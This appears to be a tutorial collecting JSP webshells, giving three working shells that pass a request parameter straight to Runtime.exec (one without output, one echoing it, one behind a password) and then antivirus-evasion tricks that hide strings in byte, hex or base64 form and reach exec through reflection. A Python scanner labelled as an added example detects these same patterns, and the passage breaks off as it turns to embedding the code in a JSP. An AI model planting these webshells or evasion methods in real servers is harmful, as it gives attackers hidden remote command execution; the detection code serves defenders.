JSP webshell collection

1. Non-echoing one-liner webshell

http://localhost/index.jsp?cmd=whoami
The result of execution is not returned to the client; only an object address is printed on the server side, so this variant is usually used to obtain a reverse shell.

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  System.out.println(process);
%>
</body>
</html>

2. Echoing one-liner webshell

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  InputStream inputStream = process.getInputStream();
  BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
  String line;
  while ((line = bufferedReader.readLine())!=null){
     response.getWriter().print(line);
    }
%>
</body>
</html>

3. Password-protected echoing one-liner webshell

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  if ("password".equals(request.getParameter("p"))){
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine())!=null){
        response.getWriter().print(line);
    }
  }
%>
</body>
</html>

4. Anti-virus evasion

(1) String obfuscation in JSP

package com.eleven.test;
import sun.misc.BASE64Decoder;           // JDK-internal API, no longer available from JDK 9 on
import javax.xml.bind.DatatypeConverter; // java.xml.bind module, removed from the JDK in 11
import java.io.IOException;
public class JspEncode {
    public static void main(String[] args) throws IOException {
        // All three expressions evaluate to the same string, which never appears as a plain literal in the source.
        String a = new String(new byte[] {121,122,100,100,77,114,54}); // decimal byte values
        System.out.println("ASCII: "+a);
        String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236")); // hex encoding
        System.out.println("HEX: "+ b);
        String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg==")); // base64 encoding
        System.out.println("BASE64: "+c);
    }
}

(2) Bypass via class reflection

package com.eleven.test;

import java.lang.reflect.Method;
import java.util.Scanner;

public class Test {
    public static void main(String[] args) throws Exception {
        String op = "";
        Class rt = Class.forName("java.lang.Runtime"); // load the Runtime class
        Method gr = rt.getMethod("getRuntime");  // look up the getRuntime method
        Method ex = rt.getMethod("exec", String.class);  // look up the exec method
        Process e = (Process) ex.invoke(gr.invoke(null),  "cmd /c whoami"); // call it via invoke with the argument
        // the code below collects the output
        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
        System.out.print(op);
    }

}
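From the defender's side, sections (1) and (2) describe exactly what a file scanner has to undo: a literal hidden in a byte array, hex or base64 is resolved at runtime, and the Runtime class is reached through reflection instead of a direct call. The following Python scanner is an added example, not code from the original post; it rewrites those three literal-hiding constructs into the plain string they evaluate to and then matches the indicators from the shells in sections 1 to 4. The file names and JSP fragments in SAMPLES are constructed for the demonstration.

```python
import base64
import re

# Constructed JSP fragments modelled on the patterns in this write-up (not files from the page).
SAMPLES = {
    "plain.jsp": '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "reflect.jsp": '<% Class rt = Class.forName("java.lang.Runtime"); Method ex = rt.getMethod("exec", String.class); %>',
    "hidden.jsp": ('<% Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65"))); '
                   'Method ex = rt.getMethod(new String(new byte[]{101,120,101,99}), String.class); %>'),
    "benign.jsp": '<% String name = request.getParameter("name"); out.print(name); %>',
}

# Each decoder matches one literal-hiding construct from section (1) and yields the plain text.
DECODERS = [
    (re.compile(r'new byte\[\]\s*\{([^}]*)\}'),
     lambda m: bytes(int(x) & 0xFF for x in m.group(1).split(",") if x.strip()).decode("latin-1")),
    (re.compile(r'DatatypeConverter\.parseHexBinary\(\s*"((?:[0-9a-fA-F]{2})*)"\s*\)'),
     lambda m: bytes.fromhex(m.group(1)).decode("latin-1")),
    (re.compile(r'new BASE64Decoder\(\)\s*\.decodeBuffer\(\s*"([A-Za-z0-9+/=]*)"\s*\)'),
     lambda m: base64.b64decode(m.group(1)).decode("latin-1")),
]
# new String("x") -> "x", so the rules see the same text a non-obfuscated shell contains.
UNWRAP = re.compile(r'new String\s*\(\s*("(?:[^"\\]|\\.)*")\s*\)')

RULES = [  # indicators taken from sections 1-4, checked against the normalized source
    ("exec-of-request-parameter", re.compile(r'Runtime\.getRuntime\(\)\s*\.exec\s*\(\s*request\.getParameter')),
    ("reflective-runtime-load", re.compile(r'Class\.forName\s*\(\s*"java\.lang\.Runtime"\s*\)')),
    ("reflective-exec-lookup", re.compile(r'getMethod\s*\(\s*"exec"')),
    ("process-output-to-response", re.compile(r'getInputStream\(\)[\s\S]*?response\.getWriter\(\)')),
]

def _as_literal(decode, m):
    try:
        return '"' + decode(m).replace("\\", "\\\\").replace('"', '\\"') + '"'
    except ValueError:  # malformed literal: leave it as written
        return m.group(0)

def normalize(source: str) -> str:
    """Replace decode-at-runtime constructs with the string literal they evaluate to."""
    for pattern, decode in DECODERS:
        source = pattern.sub(lambda m, d=decode: _as_literal(d, m), source)
    return UNWRAP.sub(r"\1", source)

def scan(source: str) -> list:
    """Return the names of the indicators that match once hidden literals are decoded."""
    hits = ["obfuscated-string-literal"] if any(p.search(source) for p, _ in DECODERS) else []
    normalized = normalize(source)
    hits.extend(name for name, pat in RULES if pat.search(normalized))
    return hits
```

Run `scan()` over every deployed `*.jsp` and `*.jspx` file of a web application and treat any hit in a file that is not part of the release as a finding to investigate.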

The next step is to place it inside a JSP.

Using base64 encoding